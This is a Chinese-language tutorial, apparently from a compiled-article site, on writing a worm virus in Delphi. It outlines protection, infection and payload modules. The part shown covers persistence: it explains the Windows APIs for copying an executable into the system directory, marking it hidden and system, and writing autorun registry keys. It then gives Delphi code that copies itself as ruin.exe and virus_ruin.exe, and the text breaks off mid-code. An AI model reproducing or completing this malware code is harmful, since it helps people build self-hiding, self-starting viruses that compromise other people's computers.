浅谈用delphi来编写蠕虫病毒浅谈用delphi来编写蠕虫病毒（精选6篇），这次小编给大家整理过的浅谈用delphi来编写蠕虫病毒，供大家阅读参考。篇1：浅谈用delphi来编写蠕虫病毒{注：由于小弟水平有限，并且是小弟第一次写文章，自然难免有很多不足的地方，还请大家包涵！如果你有什么意见和建议，也请给我来信，大家互相学习，互相探讨！}前言：可能大家想到病毒，第一反应就是可能是用asm来编写，或者是vbsript，而高级语言如delphi就好象不能编写一样，其实事实并不是这个样子的，只要我们花一些时间，照样可以写出简短而高效的病毒程序来，一点也不输那些用汇编写出来的程序哦，一个病毒程序首先要短小，我们的目标是经过压缩后控制在30k以下。用过delphi的朋友都知道，如果在uses里面加入forms,classes.....等就会使目标文件非常的大，所以，在我们的程序里，我们要尽可能的不用这些库。我们只用windows,winsock,shellapi,sysutils(这个里面包含了一些常用的函数，比如对文件的操作，对字符串的操作，如果用自己的程序来代替，目标文件会更加的小)首先，我们知道，一个病毒程序一般都分下面三个模块：①保护模块；②感染模块；③发作模块。下面我们就从这三个模块开始，分别实现他们的代码。一)保护模块。一般，我们都是把自身拷贝到系统的一些目录里，比如%systemroot%那么，我们首先要取得这些特定的目录的路径sdk里面给我们提供了一个这样的函数GetSystemDirectoryUINTGetSystemDirectory(LPTSTRlpBuffer,//存放返回的字符串的缓冲区UINTuSize//上面的缓冲去的长度);相关的函数还有GetWindowsDirectory可以得到%windows%的路径得到了系统的目录后，第二步就是拷贝文件了。sdk为我们提供了一个函数copyfileBOOLCopyFile(LPCTSTRlpExistingFileName,//源文件的路径LPCTSTRlpNewFileName,//目标文件的路径BOOLbFailIfExists//这是一个标志，如果目标文件已经存在，是否强制覆盖);拷贝文件完毕后,我们来把这个文件设置为系统和隐藏，那么一般情况是看不见该文件的，除非选取查看所有文件，以及显示受保护文件。同样，介绍一个函数SetFileAttributesBOOLSetFileAttributes(LPCTSTRlpFileName,//需要设置的文件的文件名DWORDdwFileAttributes//设置的值。);我们这里要设置为隐藏和系统，那么就为第二个参数传递FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM下面就是最重要的，让该文件开机自动运行，我们一般都是写注册表，首先用RegOpenKey函数来打开一个键，LONGRegOpenKey(HKEYhKey,//主键，比如HKEY_LOCAL_MACHINELPCTSTRlpSubKey,//跟随的subkeyPHKEYphkResult//存放函数返回这个打开的键的句柄);得到了HKEY后，就可以用regsetvalueex来向该键写具体的值了。LONGRegSetValueEx(HKEYhKey,//这个就是刚才我们得到的句柄LPCTSTRlpValueName,//键名的地址DWORDReserved,//一般设置为0DWORDdwType,//我们写的键的类型，字符串为REG_SZCONSTBYTE*lpData,//键值的地址DWORDcbData//写入的键值的长度);下面，我综合上面的说明来给出一个简短的例子：procedureSelfCopy;varPath,Value:array[0..255]ofchar;Hk:HKEY;S:string;beginGetSystemDirectory(Path,256);//取得系统的路径s:=strpas(Path);//转换成字符串CopyFile(pchar(paramstr(0)),pchar(S+'ruin.exe'),false);CopyFile(pchar(paramstr(0)),pchar(S+'virus_ruin.exe'),false);//把自身拷贝到系统目录下为ruin.exe,virus_ruin.exeSetFileAttributes(pchar(S+'ruin.exe'),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);SetFileAttributes(pchar(S+'virus_ruin.exe'),FILE_ATTRIBUT